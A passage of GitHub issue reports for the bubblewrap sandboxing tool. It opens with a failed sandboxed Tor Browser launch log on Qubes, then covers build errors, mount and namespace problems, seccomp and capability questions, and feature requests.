2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXcomposite.so.1.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXdamage.so.1.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXt.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0.21409.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libcairo.so.2.11400.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libdatrie.so.1.3.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2.2.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libffi.so.6.0.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.8.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libfreetype.so.6.11.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0.2400.25
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.3100.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgraphite2.so.3.0.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.25
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.935.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpixman-1.so.0.32.6
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libthai.so.0.2.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
2016/12/25 05:35:20 sandbox: fdArgs: [--dev /dev --tmpfs /tmp --setenv XDG_RUNTIME_DIR /run/user/1000 --dir /run/user/1000 --setenv HOME /home/amnesia --dir /home/amnesia --unshare-user --unshare-ipc --unshare-pid --unshare-net --unshare-uts --unshare-cgroup-try --hostname amnesia --proc /proc --chdir /home/amnesia/sandboxed-tor-browser/tor-browser/Browser --uid 1000 --gid 1000 --seccomp 10 --info-fd 11 --setenv DISPLAY :0 --dir /tmp/.X11-unix --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 --ro-bind /usr/share/themes/Adwaita/gtk-2.0 /usr/share/themes/Adwaita/gtk-2.0 --ro-bind /usr/share/icons/Adwaita /usr/share/icons/Adwaita --ro-bind /usr/share/icons/hicolor /usr/share/icons/hicolor --ro-bind /usr/share/mime /usr/share/mime --setenv GTK2_RC_FILES /home/amnesia/.gtkrc-2.0 --file 4 /home/amnesia/.gtkrc-2.0 --ro-bind /usr/share/libthai/thbrk.tri /usr/share/libthai/thbrk.tri --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser /home/amnesia/sandboxed-tor-browser/tor-browser --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/Desktop /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Desktop --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/Downloads /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Downloads --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/Caches /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/Caches --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/preferences /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/preferences --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/extensions /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/extensions --setenv LD_LIBRARY_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor --setenv FONTCONFIG_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/fontconfig --setenv FONTCONFIG_FILE fonts.conf --setenv ASAN_OPTIONS detect_leaks=0 --setenv NSS_DISABLE_HW_AES 1 --symlink /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Desktop /home/amnesia/Desktop --symlink /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Downloads /home/amnesia/Downloads --setenv TOR_SOCKS_PORT 9150 --setenv TOR_CONTROL_PORT 9151 --setenv TOR_SKIP_LAUNCH 1 --setenv TOR_NO_DISPLAY_NETWORK_SETTINGS 1 --setenv TOR_STUB_CONTROL_SOCKET /run/user/1000/control --setenv TOR_STUB_SOCKS_SOCKET /run/user/1000/socks --bind /run/user/1000/sandboxed-tor-browser/control /run/user/1000/control --bind /run/user/1000/sandboxed-tor-browser/socks /run/user/1000/socks --file 5 /home/amnesia/.tbb_stub.so --setenv LD_PRELOAD libasan.so.2:/home/amnesia/.tbb_stub.so --setenv LIBGL_ALWAYS_SOFTWARE 1 --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libadwaita.so /usr/lib/gtk-2.0/2.10.0/engines/libadwaita.so --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libpixmap.so /usr/lib/gtk-2.0/2.10.0/engines/libpixmap.so --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so /usr/lib/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so --setenv GTK_PATH /usr/lib/gtk-2.0 --ro-bind /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so --file 6 /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache --setenv GDK_PIXBUF_MODULE_FILE /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache --ro-bind /lib/x86_64-linux-gnu/ld-2.19.so /lib/ld-linux-x86-64.so.2 --ro-bind /lib/x86_64-linux-gnu/libc-2.19.so /usr/lib/libc.so.6 --ro-bind /lib/x86_64-linux-gnu/libdbus-1.so.3.8.13 /usr/lib/libdbus-1.so.3 --ro-bind /lib/x86_64-linux-gnu/libdl-2.19.so /usr/lib/libdl.so.2 --ro-bind /lib/x86_64-linux-gnu/libexpat.so.1.6.0 /usr/lib/libexpat.so.1 --ro-bind /lib/x86_64-linux-gnu/libgcc_s.so.1 /usr/lib/libgcc_s.so.1 --ro-bind /lib/x86_64-linux-gnu/libglib-2.0.so.0.4200.1 /usr/lib/libglib-2.0.so.0 --ro-bind /lib/x86_64-linux-gnu/libm-2.19.so /usr/lib/libm.so.6 --ro-bind /lib/x86_64-linux-gnu/libpcre.so.3.13.1 /usr/lib/libpcre.so.3 --ro-bind /lib/x86_64-linux-gnu/libpng12.so.0.50.0 /usr/lib/libpng12.so.0 --ro-bind /lib/x86_64-linux-gnu/libpthread-2.19.so /usr/lib/libpthread.so.0 --ro-bind /lib/x86_64-linux-gnu/libresolv-2.19.so /usr/lib/libresolv.so.2 --ro-bind /lib/x86_64-linux-gnu/librt-2.19.so /usr/lib/librt.so.1 --ro-bind /lib/x86_64-linux-gnu/libselinux.so.1 /usr/lib/libselinux.so.1 --ro-bind /lib/x86_64-linux-gnu/libuuid.so.1.3.0 /usr/lib/libuuid.so.1 --ro-bind /lib/x86_64-linux-gnu/libz.so.1.2.8 /usr/lib/libz.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libICE.so.6.3.0 /usr/lib/libICE.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libSM.so.6.0.1 /usr/lib/libSM.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 /usr/lib/libX11.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 /usr/lib/libXau.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXcomposite.so.1.0.0 /usr/lib/libXcomposite.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2 /usr/lib/libXcursor.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXdamage.so.1.1.0 /usr/lib/libXdamage.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 /usr/lib/libXdmcp.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 /usr/lib/libXext.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0 /usr/lib/libXfixes.so.3 --ro-bind /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0 /usr/lib/libXi.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 /usr/lib/libXinerama.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0 /usr/lib/libXrandr.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0 /usr/lib/libXrender.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXt.so.6.0.0 /usr/lib/libXt.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0 /usr/lib/libasound.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0.21409.1 /usr/lib/libatk-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libcairo.so.2.11400.0 /usr/lib/libcairo.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libdatrie.so.1.3.1 /usr/lib/libdatrie.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2.2.2 /usr/lib/libdbus-glib-1.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libffi.so.6.0.2 /usr/lib/libffi.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.8.0 /usr/lib/libfontconfig.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libfreetype.so.6.11.1 /usr/lib/libfreetype.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0.2400.25 /usr/lib/libgdk-x11-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.3100.1 /usr/lib/libgdk_pixbuf-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.4200.1 /usr/lib/libgio-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0.4200.1 /usr/lib/libgmodule-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0.4200.1 /usr/lib/libgobject-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgraphite2.so.3.0.1 /usr/lib/libgraphite2.so.3 --ro-bind /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0.4200.1 /usr/lib/libgthread-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.25 /usr/lib/libgtk-x11-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.935.0 /usr/lib/libharfbuzz.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0.3600.8 /usr/lib/libpango-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0.3600.8 /usr/lib/libpangocairo-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0.3600.8 /usr/lib/libpangoft2-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpixman-1.so.0.32.6 /usr/lib/libpixman-1.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libthai.so.0.2.0 /usr/lib/libthai.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.0 /usr/lib/libxcb-render.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0 /usr/lib/libxcb-shm.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 /usr/lib/libxcb.so.1 --symlink /lib /lib64 --symlink /usr/lib /usr/lib64 --setenv LD_LIBRARY_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor:/usr/lib --file 7 /etc/passwd --file 8 /etc/group --file 9 /var/lib/dbus/machine-id --symlink /var/lib/dbus/machine-id /etc/machine-id]
2016/12/25 05:35:20 sandbox: bwrap pid is: 16202
2016/12/25 05:35:20 sandbox: child pid is: 16203
2016/12/25 05:35:20 launch: Complete.
2016/12/25 05:35:20 firefox: Can't mount proc on /newroot/proc
2016/12/25 05:35:20 firefox: : Operation not permitted
2016/12/25 05:35:20 fatal error in the user interface: waitid: no child processes

A simple test bwrap --ro-bind / / --proc /proc --dev /dev /bin/bash worked for me.

Outside of Qubes, i.e. in a Non-Qubes Debian jessie (VirtualBox) VM sandboxed-tor-browser works fine.

So I guess "something that Qubes does breaks bubblewrap". Could you help us please making this more specific?

I've been advised to:

Rebuild bubblewrap with strategic debugging instrumentation added.

Use ptrace/ltrace/gdb to figure out what's actually going on.

Do you know why this is happening? How to fix this? Want any debug output? If you like a rebuild how bubblewrap with debugging enabled, where do you find build instructions?

Allow dropping all capabilities inside the jail

When using user namespaces to create a jail, I still have access to capabilities like CAP_SYS_ADMIN

I would like to be able to tell the wrapper to drop all capabilities without exceptions when run as a normal user.

Please note that user namespaces reset capabilities. Inside a user namespace all capabilities are available to the user by default

Bubblewrap vs nsjail?

Is there a reason the the (seemingly) overlapping functionality of bubblewrap to the Google nsjails project?

Release model

We haven't yet done a release, I think we should.

Maybe let's use 0.1.0 implementing semver ?

I've been using YEAR.SERIAL for ostree since I don't think semver applies as much to non-libraries, but bubblewrap is kind of a library.

Compilation fails on CentOS 7

Compilation fails on CentOS 7 at the xsltproc step:

sudo yum install git autoconf gcc make automake libcap-devel
git clone https://github.com/projectatomic/bubblewrap --depth 1
cd bubblewrap/
./autogen.sh 
make

make  all-am
make[1]: Entering directory `/home/me/bubblewrap'
xsltproc --nonet --stringparam man.output.quietly 1 --stringparam funcsynopsis.style ansi --stringparam man.th.extra1.suppress 1 --stringparam man.authors.section.enabled 0 --stringparam man.copyright.section.enabled 0 http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl bwrap.xml
I/O error : Attempt to load network entity http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl
warning: failed to load external entity "http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl"
cannot parse http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl

Document required kernel configuration

From my tests, you'd need at least:

Namespaces support

CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_USER_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y

Either commit eedf265aa003b4781de24cfed40a655a664457e6 or CONFIG_DEVPTS_MULTIPLE_INSTANCES enabled.
CONFIG_OVERLAY_FS for mounts

Separately, FUSE would needed for Flatpak.

`make dist` does not include `bwrap.xml`

A ./configure && make fails to create bwrap.1 from bwrap.xml using the 0.1.3 release tarball because bwrap.xml is not included.

Workaround is to use ./configure --disable-man or to copy the the file from git.

--tmpfs with mode=777

Is it necessary to have --tmpfs use mode=755? I'm running sshd in bwrap and would like to allow other users to log in and be able to write to /tmp.

Unable to --ro-bind, unable to --dev.

Hello,

bwrap seems to no work on my system. I can bind the / to /, althought then I get read-only /dev. If I add then --dev /dev it does not work at all. Neither does bwrap --ro-bind / / sh work.

# ./bwrap --bind / / sh                   
# echo foo >/dev/null
sh: can't create /dev/null: Permission denied

# ./bwrap --dev /dev --bind / / sh
Can't bind mount /oldroot/ on /newroot/: Invalid argument
Can't read from privileged_op_socket

# ./bwrap --ro-bind / / sh        
Can't bind mount /oldroot/ on /newroot/: No such file or directory
Can't read from privileged_op_socket

and with strace

# strace ./bwrap --ro-bind / / sh 
execve("./bwrap", ["./bwrap", "--ro-bind", "/", "/", "sh"], [/* 76 vars */]) = 0
brk(NULL)                               = 0x1e8b000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14039000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=206103, ...}) = 0
mmap(NULL, 206103, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f8e14006000
close(3)                                = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\10\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689000, ...}) = 0
mmap(NULL, 3795488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f8e13a79000
mprotect(0x7f8e13c0e000, 2097152, PROT_NONE) = 0
mmap(0x7f8e13e0e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7f8e13e0e000
mmap(0x7f8e13e14000, 14880, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f8e13e14000
close(3)                                = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14005000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14004000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14003000
arch_prctl(ARCH_SET_FS, 0x7f8e14004700) = 0
mprotect(0x7f8e13e0e000, 16384, PROT_READ) = 0
mprotect(0x608000, 4096, PROT_READ)     = 0
mprotect(0x7f8e1403a000, 4096, PROT_READ) = 0
munmap(0x7f8e14006000, 206103)          = 0
capget({_LINUX_CAPABILITY_VERSION_3, 0}, {CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_FOWNER|CAP_FSETID|CAP_KILL|CAP_SETGID|CAP_SETUID|CAP_SETPCAP|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_MODULE|CAP_SYS_RAWIO|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_PACCT|CAP_SYS_ADMIN|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_MKNOD|CAP_LEASE|CAP_AUDIT_WRITE|CAP_AUDIT_CONTROL|CAP_SETFCAP|CAP_MAC_OVERRIDE|CAP_MAC_ADMIN|CAP_SYSLOG|CAP_WAKE_ALARM|CAP_BLOCK_SUSPEND|CAP_AUDIT_READ, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_FOWNER|CAP_FSETID|CAP_KILL|CAP_SETGID|CAP_SETUID|CAP_SETPCAP|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_MODULE|CAP_SYS_RAWIO|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_PACCT|CAP_SYS_ADMIN|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_MKNOD|CAP_LEASE|CAP_AUDIT_WRITE|CAP_AUDIT_CONTROL|CAP_SETFCAP|CAP_MAC_OVERRIDE|CAP_MAC_ADMIN|CAP_SYSLOG|CAP_WAKE_ALARM|CAP_BLOCK_SUSPEND|CAP_AUDIT_READ, 0}) = 0
getuid()                                = 0
geteuid()                               = 0
capset({_LINUX_CAPABILITY_VERSION_3, 0}, {CAP_NET_ADMIN|CAP_SYS_CHROOT|CAP_SYS_ADMIN, CAP_NET_ADMIN|CAP_SYS_CHROOT|CAP_SYS_ADMIN, 0}) = 0
prctl(PR_SET_DUMPABLE, 1)               = 0
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)  = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
brk(NULL)                               = 0x1e8b000
brk(0x1ead000)                          = 0x1ead000
readlink("/proc/self/fd/1", "/dev/pts/2", 4095) = 10
stat("/dev/pts/2", {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
getuid()                                = 0
getgid()                                = 0
open("/proc", O_RDONLY|O_PATH)          = 3
mkdir("/run/user/0/.bubblewrap", 0755)  = -1 ENOENT (No such file or directory)
mkdir("/tmp/.bubblewrap-0", 0755)       = -1 EEXIST (File exists)
rt_sigprocmask(SIG_BLOCK, [CHLD], NULL, 8) = 0
clone(child_stack=0, flags=CLONE_NEWNS|SIGCHLD) = 1945
capset({_LINUX_CAPABILITY_VERSION_3, 0}, {0, 0, 0}) = 0
openat(3, "self/fd", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 4
fstat(4, {st_mode=S_IFDIR|0500, st_size=0, ...}) = 0
fcntl(4, F_GETFL)                       = 0x18800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY)
fcntl(4, F_SETFD, FD_CLOEXEC)           = 0
getdents(4, /* 7 entries */, 32768)     = 168
close(3)                                = 0
getdents(4, /* 0 entries */, 32768)     = 0
close(4)                                = 0
signalfd4(-1, [CHLD], 8, SFD_CLOEXEC|SFD_NONBLOCK) = 3
poll([{fd=3, events=POLLIN}], 1, -1Can't bind mount /oldroot/ on /newroot/: No such file or directory
Can't read from privileged_op_socket
)    = 1 ([{fd=3, revents=POLLIN}])
read(3, "\21\0\0\0\0\0\0\0\1\0\0\0\231\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 128) = 128
exit_group(1)                           = ?
+++ exited with 1 +++

I am running Gentoo system, with kernel 4.5.2, all but USER_NS enabled in kernel config. The /dev is tmpfs populated with busybox's mdev. No systemd either.

--seccomp and --unshare-user options?

How do we leverage seccomp_export_bpf to generate rules? Is there a tool available? Does passing the compiled list to --seccomp result in rules to be whitelisted or blacklisted?
If bwrap creates a new user namespace for the sandbox by default, why does the --unshare-user option exist? To allow for custom UID/GID only?

Install the seccomp filter immediately prior to the exec call.

The setsid() change broke my code because I use a seccomp whitelist, which didn't include setsid, and the seccomp filter gets installed prior to the call. To avoid problems like this in the future, the prctl call should be done as close to immediately prior to the execvp as possible.

As it stands there's other calls that need to be placed in everyone's whitelist that don't need to be if the filter was installed last, which is unnecessary attack surface, though the benefits here are likely fairly minor since bubblewrap is done doing most of the exotic things by the time the filter is installed currently.

Ordering of mounts

I spent quite some time on this before realising what was happening. The ordering of the mounts seem to matter, else you get an error that isn't completely obvious (well to me anyway).

A working example:
/usr/bin/bwrap --ro-bind /tmp/sandbox / --proc /proc [command]

Whereas with the mounts reversed:

/usr/bin/bwrap --proc /proc --ro-bind /tmp/sandbox / [command]
Can't bind mount /oldroot/tmp/sandbox on /newroot/: Invalid argument
Can't read from privileged_op_socket

Is this a bug or user fail to understand/read the docs? Either way, would still be nice to point this out to other users as an issue (with solution)

chown

Sorry. Mistakenly created. Though I have related question - my debian chown is not working inside bwrap.

demos/bubblewrap-shell does not work

Running demos/bubblewrap-shell on bubblewrap 0.1.2 gets the following error

$ ./bubblewrap-shell.sh 
execvp /bin/sh: No such file or directory

Not running a Fedora distro, in case that is an issue?

Distributor ID: Debian
Description:    Debian GNU/Linux 8.4 (jessie)
Release:    8.4
Codename:   jessie

I have been getting loads of related errors to the above while using bweap, but thought I would make sure some of the demos worked first

bash: /dev/null: Permission denied

While testing https://bodhi.fedoraproject.org/updates/bubblewrap-0.1.4-5.fc25 on a F25 Vagrant box, I observed the following:

$ rpm -q bubblewrap
bubblewrap-0.1.4-5.fc25.x86_64
$ whoami
vagrant
$ bwrap --ro-bind / / bash
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied

Despite the errors, the operation appeared successful.

Better support for fuse mounts

See coreos/rpm-ostree@d8236fe#diff-09f193d5b6a2bdd4879408a42276b6b1R115

support socket activation

There has been some interest in using flatpak for shipping services that listen on sockets. I think bubblewrap will need some support to make this work

mount flags

When using mount() inside of bubblewrap, there is always the MS_MGC_VAL flag.

However:

Specifying MS_MGC_VAL was required in kernel versions prior to 2.4, but since Linux 2.4 is no longer required and is ignored if specified.

http://man7.org/linux/man-pages/man2/mount.2.html

Is there still a reason it is used?

experiment with taking seccomp out

Can we instead take a reference to a fd which has the pre-compiled BPF to load?

Consider usage as git submodule

We could port xdg-app and linux-user-chroot to this, installing in e.g. /usr/libexec/xdg-app/bubblewrap

kill background processes on exit

I run an application using bubblewrap that forks off a number of background processes. When closing the application, the background processes are not always cleaned up, so if I run lsns, I will still see bwrap running and the background processes as its children. To clean up the namespace, I have to send the KILL signal to bwrap.

Is it possible for bwrap to automatically kill everything in the namespace when the foreground process terminates? Or is there a reason why that wouldn't be appropriate?

BTW, bubblewrap is awesome; thanks for writing it!

Design for setting up fuse mounts (setuid)

If I try to mount a encfs folder inside bwrap, I get the error:
fuse: device not found, try 'modprobe fuse' first
The fuse module is loaded, and encfs works fine when used outside of bwrap.

EDIT: I'm guessing this has something to do with encfs using fusermount, which has the setuid bit.

SELinux MCS isolation

We're going to need to implement what Docker has now where we do MCS isolation. See:

https://github.com/opencontainers/runc/blob/90472aeb9e5d5ef2722581d7dfbb573ef74f07cc/libcontainer/selinux/selinux.go

The ugly part here is that basically the daemon maintains a global state of MCS labels that have been allocated. Without a daemon, we'd need to use some well-known shared state file (/run/bubblewrap/selinux ?)

(Enhancement) Make `--unshare-uts` generally useful.

There's not much point to creating a new UTS namespace when the hostname/domainname are inherited, and CAP_SYS_ADMIN is dropped before user code is executed, making it generally "hard" to change the values.

It would be nice (and straight forward) to have the capability to set the hostname/domainname in the sandboxed child namespace.

reserved identifier violation

